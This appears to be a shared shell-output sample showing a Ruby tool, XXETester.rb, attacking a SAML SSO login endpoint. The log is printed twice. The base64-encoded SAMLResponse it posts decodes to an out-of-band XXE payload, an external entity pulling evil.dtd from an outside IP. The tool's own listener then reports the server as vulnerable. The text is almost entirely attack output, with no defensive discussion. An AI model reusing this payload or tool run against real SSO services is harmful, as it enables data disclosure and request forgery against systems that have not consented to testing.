mrbrutti/wr_post_sample_1.sh

## wr_post_sample_1.sh
ruby XXETester.rb https://domain.com:4285/api/SsoAuthLoginResponse
Puma 2.14.0 starting…
* Min threads: 0, max threads: 16
* Environment: development
* Listening on tcp://0.0.0.0:80
== Sinatra (v1.4.6) has taken the stage on 80 for development with backup from Puma
Running XXE Payload against server https://domain.com:4285/api/SsoAuthLoginResponse
Running XXE Payload against server https://domain.com:4285/api/SsoAuthLoginResponse
RestClient.post “https://domain.com:4285/api/SsoAuthLoginResponse", 6263 byte(s) length, “Accept”=>”text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8", “Accept-Encoding”=>”gzip, deflate”, “Accept-encoding”=>”gzip, deflate, br”, “Accept-language”=>”en-US,en;q=0.5", “Connection”=>”close”, “Content-Length”=>”6263", “Upgrade-insecure-requests”=>”1", “User-agent”=>”Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0"
RestClient.post “https://domain.com:4285/api/SsoAuthLoginResponse", “SAMLResponse=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48IURPQ1RZ%0AUEUgcm9vdCBbIDwhRU5USVRZICUgcmVtb3RlIFNZU1RFTSAiaHR0cDovLzIz%0ALjI1Mi42My45MC9ldmlsLmR0ZCI%2BICVyZW1vdGU7XT4%3D&RelayState=”, “Accept”=>”text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8", “Accept-Encoding”=>”gzip, deflate”, “Accept-encoding”=>”gzip, deflate, br”, “Accept-language”=>”en-US,en;q=0.5", “Connection”=>”close”, “Content-Length”=>”199", “Upgrade-insecure-requests”=>”1", “User-agent”=>”Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0"
The Server is Vulnerable | IP 1.2.3.4 | Path /evil.dtd
	ruby XXETester.rb https://domain.com:4285/api/SsoAuthLoginResponse
	Puma 2.14.0 starting…
	* Min threads: 0, max threads: 16
	* Environment: development
	* Listening on tcp://0.0.0.0:80
	== Sinatra (v1.4.6) has taken the stage on 80 for development with backup from Puma
	Running XXE Payload against server https://domain.com:4285/api/SsoAuthLoginResponse
	Running XXE Payload against server https://domain.com:4285/api/SsoAuthLoginResponse
	RestClient.post “https://domain.com:4285/api/SsoAuthLoginResponse", 6263 byte(s) length, “Accept”=>”text/html, application/xhtml+xml, application/xml;q=0.9, /;q=0.8", “Accept-Encoding”=>”gzip, deflate”, “Accept-encoding”=>”gzip, deflate, br”, “Accept-language”=>”en-US,en;q=0.5", “Connection”=>”close”, “Content-Length”=>”6263", “Upgrade-insecure-requests”=>”1", “User-agent”=>”Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0"
	RestClient.post “https://domain.com:4285/api/SsoAuthLoginResponse", “SAMLResponse=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48IURPQ1RZ%0AUEUgcm9vdCBbIDwhRU5USVRZICUgcmVtb3RlIFNZU1RFTSAiaHR0cDovLzIz%0ALjI1Mi42My45MC9ldmlsLmR0ZCI%2BICVyZW1vdGU7XT4%3D&RelayState=”, “Accept”=>”text/html, application/xhtml+xml, application/xml;q=0.9, /;q=0.8", “Accept-Encoding”=>”gzip, deflate”, “Accept-encoding”=>”gzip, deflate, br”, “Accept-language”=>”en-US,en;q=0.5", “Connection”=>”close”, “Content-Length”=>”199", “Upgrade-insecure-requests”=>”1", “User-agent”=>”Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0"
	The Server is Vulnerable \| IP 1.2.3.4 \| Path /evil.dtd